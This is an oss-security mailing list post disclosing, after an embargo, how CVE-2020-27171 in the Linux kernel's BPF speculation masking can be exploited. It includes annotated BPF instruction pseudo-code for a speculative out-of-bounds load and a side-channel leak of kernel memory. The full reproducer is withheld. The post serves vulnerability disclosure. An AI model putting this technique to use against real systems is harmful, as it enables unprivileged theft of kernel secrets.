Date: Wed, 24 Mar 2021 19:38:11 +0000 From: Piotr Krysiuk <piotras@...il.com> To: oss-security@...ts.openwall.com Subject: Re: [CVE-2020-27171] Numeric error when restricting speculative pointer arithmetic allows unprivileged local users to leak content of kernel memory Some details of how CVE-2020-27171 could be exploited in practice were provided via linux-distros mailing list with 7 days embargo. This was intended to help any affected Linux distributions to assess the risk and decide about any appropriate actions. As the embargo expires today, I was asked to share these details publically on oss-security. The CVE-2020-27171 vulnerability has been successfully reproduced against Linux kernel v5.12-rc3 using the following logic for BPF program attached to a socket: load pointer to our big array into BPF_REG_MAP_PTR, load offset of data to leak into BPF_REG_OFFSET, BPF_MOV64_REG(BPF_REG_OOB_ADDRESS, BPF_REG_MAP_PTR), // load any slowly-loaded value... BPF_LDX_MEM(BPF_DW, BPF_REG_SLOW_CHECK, BPF_REG_MAP_PTR, 0x1200), // ... and turn it into known zero for verifier, // while preserving slowly-loaded dependency for affected hardware BPF_ALU64_IMM(BPF_AND, BPF_REG_SLOW_CHECK, 1), BPF_ALU64_IMM(BPF_AND, BPF_REG_SLOW_CHECK, 2), // speculatively bypassed offset check BPF_JMP_REG(BPF_JNE, BPF_REG_OFFSET, BPF_REG_SLOW_CHECK, skip_speculation), // speculatively subtract masked BPF_REG_OFFSET from BPF_REG_OOB_ADDRESS, // where incorrect mask value 0xffffffff is used due to integer underflow BPF_ALU64_REG(BPF_SUB, BPF_REG_OOB_ADDRESS, BPF_REG_OFFSET), // speculatively out-of-bounds load BPF_LDX_MEM(BPF_B, BPF_REG_LEAKED_BYTE, BPF_REG_OOB_ADDRESS, 0), transmit speculatively loaded BPF_REG_LEAKED_BYTE via side-channel, The full reproducers were shared with a number of Linux distributions for protection purposes.
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.